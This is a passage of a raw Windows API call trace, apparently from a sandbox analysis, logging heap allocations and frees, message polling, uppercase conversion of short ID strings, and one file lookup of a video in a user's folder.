[0214.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0214.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0214.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0214.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0214.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72388 [0214.796] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0214.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ad0 [0214.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0214.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0214.796] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0214.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72208 [0214.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72258 [0214.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0214.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0214.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0214.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0214.796] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0214.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72268 [0214.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d78 [0214.796] CharUpperBuffW (in: lpsz="SSA2100602512", cchLength=0xd | out: lpsz="SSA2100602512") returned 0xd [0214.797] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d78 | out: hHeap=0x2af0000) returned 1 [0214.797] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0214.797] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0214.797] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf00 | out: hHeap=0x2af0000) returned 1 [0214.797] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafa8 | out: hHeap=0x2af0000) returned 1 [0214.797] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0214.797] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0214.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ea40 [0214.797] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0214.797] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ea40 | out: hHeap=0x2af0000) returned 1 [0214.797] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0214.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0214.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722f8 [0214.797] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf00 | out: hHeap=0x2af0000) returned 1 [0214.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0214.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0214.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0214.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72238 [0214.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ee0 [0214.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0214.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722a8 [0214.797] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf00 | out: hHeap=0x2af0000) returned 1 [0214.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0214.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0214.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf48 [0214.797] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafa8 | out: hHeap=0x2af0000) returned 1 [0214.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0214.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafc0 [0214.798] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72398 [0214.798] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0214.798] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafd8 [0214.798] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72318 [0214.798] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafd8 | out: hHeap=0x2af0000) returned 1 [0214.798] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0214.798] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafd8 [0214.798] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaff0 [0214.798] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77af8 | out: hHeap=0x2af0000) returned 1 [0214.798] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0214.798] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafa8 | out: hHeap=0x2af0000) returned 1 [0214.798] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0214.798] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0214.798] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72208 [0214.798] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafa8 | out: hHeap=0x2af0000) returned 1 [0214.798] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0214.798] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0214.798] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab1b8 [0214.798] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72258 [0214.798] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e68 [0214.798] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab248 [0214.798] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72218 [0214.798] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab248 | out: hHeap=0x2af0000) returned 1 [0214.798] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0214.798] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3e0 [0214.798] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab248 [0214.798] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722b8 [0214.799] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafa8 | out: hHeap=0x2af0000) returned 1 [0214.799] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0214.799] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab230 [0214.799] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72378 [0214.799] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2a8 [0214.799] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0214.799] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2a8 | out: hHeap=0x2af0000) returned 1 [0214.799] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab230 | out: hHeap=0x2af0000) returned 1 [0214.799] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafa8 | out: hHeap=0x2af0000) returned 1 [0214.799] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722b8 | out: hHeap=0x2af0000) returned 1 [0214.799] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1b8 | out: hHeap=0x2af0000) returned 1 [0214.799] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0214.799] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab248 | out: hHeap=0x2af0000) returned 1 [0214.799] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab368 [0214.799] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab140 [0214.799] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72328 [0214.799] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0214.799] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab398 [0214.799] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722f8 [0214.799] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab398 | out: hHeap=0x2af0000) returned 1 [0214.799] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0214.799] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab230 [0214.799] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab380 [0214.799] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0214.799] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab368 | out: hHeap=0x2af0000) returned 1 [0214.799] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0214.799] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab140 | out: hHeap=0x2af0000) returned 1 [0214.799] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72328 | out: hHeap=0x2af0000) returned 1 [0214.799] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab380 | out: hHeap=0x2af0000) returned 1 [0214.800] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77af8 | out: hHeap=0x2af0000) returned 1 [0214.800] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0214.800] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0214.800] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3f8 [0214.800] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72208 [0214.800] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3f8 | out: hHeap=0x2af0000) returned 1 [0214.800] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d78 [0214.800] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2c0 [0214.800] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab248 [0214.800] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72228 [0214.800] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77df0 [0214.800] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2f0 [0214.800] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72258 [0214.800] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2f0 | out: hHeap=0x2af0000) returned 1 [0214.800] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0214.800] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab380 [0214.800] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab398 [0214.800] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d78 | out: hHeap=0x2af0000) returned 1 [0214.800] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0214.800] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2c0 | out: hHeap=0x2af0000) returned 1 [0214.800] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0214.800] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab218 [0214.800] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72328 [0214.800] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0214.800] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f08 [0214.800] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab338 [0214.800] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2f0 [0214.800] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72368 [0214.800] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0214.801] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3f8 [0214.801] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72378 [0214.801] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3f8 | out: hHeap=0x2af0000) returned 1 [0214.801] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0214.801] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3b0 [0214.801] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab308 [0214.801] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72208 [0214.801] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab338 | out: hHeap=0x2af0000) returned 1 [0214.801] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab338 [0214.801] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab188 [0214.801] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72288 [0214.801] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2a8 [0214.801] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0214.801] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos/vMM vqaD0kHJ4F.mp4", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf32fd840, ftCreationTime.dwHighDateTime=0x1d5cc1b, ftLastAccessTime.dwLowDateTime=0x9ccacc80, ftLastAccessTime.dwHighDateTime=0x1d5c7fc, ftLastWriteTime.dwLowDateTime=0x9ccacc80, ftLastWriteTime.dwHighDateTime=0x1d5c7fc, nFileSizeHigh=0x0, nFileSizeLow=0xbb15, dwReserved0=0x0, dwReserved1=0x0, cFileName="vMM vqaD0kHJ4F.mp4", cAlternateFileName="VMMVQA~1.MP4")) returned 0x9e2138 [0214.801] FindClose (in: hFindFile=0x9e2138 | out: hFindFile=0x9e2138) returned 1 [0214.801] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2a8 | out: hHeap=0x2af0000) returned 1 [0214.801] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab188 | out: hHeap=0x2af0000) returned 1 [0214.801] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab338 | out: hHeap=0x2af0000) returned 1 [0214.801] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0214.801] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2f0 | out: hHeap=0x2af0000) returned 1 [0214.801] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0214.801] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab308 | out: hHeap=0x2af0000) returned 1 [0214.802] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f08 | out: hHeap=0x2af0000) returned 1 [0214.802] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72328 | out: hHeap=0x2af0000) returned 1 [0214.802] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0214.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab170 [0214.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72328 [0214.802] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab170 | out: hHeap=0x2af0000) returned 1 [0214.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0214.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab1b8 [0214.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab260 [0214.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72278 [0214.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0214.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab278 [0214.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72368 [0214.802] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab278 | out: hHeap=0x2af0000) returned 1 [0214.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d78 [0214.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2d8 [0214.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab1d0 [0214.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72208 [0214.802] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1b8 | out: hHeap=0x2af0000) returned 1 [0214.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab1a0 [0214.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab170 [0214.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0214.802] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0214.802] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1e8 | out: hHeap=0x2af0000) returned 1 [0214.802] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab170 | out: hHeap=0x2af0000) returned 1 [0214.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1a0 | out: hHeap=0x2af0000) returned 1 [0214.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0214.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab260 | out: hHeap=0x2af0000) returned 1 [0214.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0214.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1d0 | out: hHeap=0x2af0000) returned 1 [0214.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b98 | out: hHeap=0x2af0000) returned 1 [0214.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72328 | out: hHeap=0x2af0000) returned 1 [0214.803] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0214.803] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0214.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f30 | out: hHeap=0x2af0000) returned 1 [0214.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0214.803] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0214.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0214.803] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0214.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77da0 | out: hHeap=0x2af0000) returned 1 [0214.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0214.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab170 | out: hHeap=0x2af0000) returned 1 [0214.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3f8 | out: hHeap=0x2af0000) returned 1 [0214.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab158 | out: hHeap=0x2af0000) returned 1 [0214.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72328 | out: hHeap=0x2af0000) returned 1 [0214.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0214.803] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0214.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e980 | out: hHeap=0x2af0000) returned 1 [0214.803] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0214.803] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0214.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b98 | out: hHeap=0x2af0000) returned 1 [0214.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0214.804] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0214.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0214.804] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0214.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77da0 | out: hHeap=0x2af0000) returned 1 [0214.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0214.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2c0 | out: hHeap=0x2af0000) returned 1 [0214.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab188 | out: hHeap=0x2af0000) returned 1 [0214.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab320 | out: hHeap=0x2af0000) returned 1 [0214.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0214.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0214.804] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0214.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e6c0 | out: hHeap=0x2af0000) returned 1 [0214.804] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0214.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0214.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1b8 | out: hHeap=0x2af0000) returned 1 [0214.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab200 | out: hHeap=0x2af0000) returned 1 [0214.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab428 | out: hHeap=0x2af0000) returned 1 [0214.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0214.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72328 | out: hHeap=0x2af0000) returned 1 [0214.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, 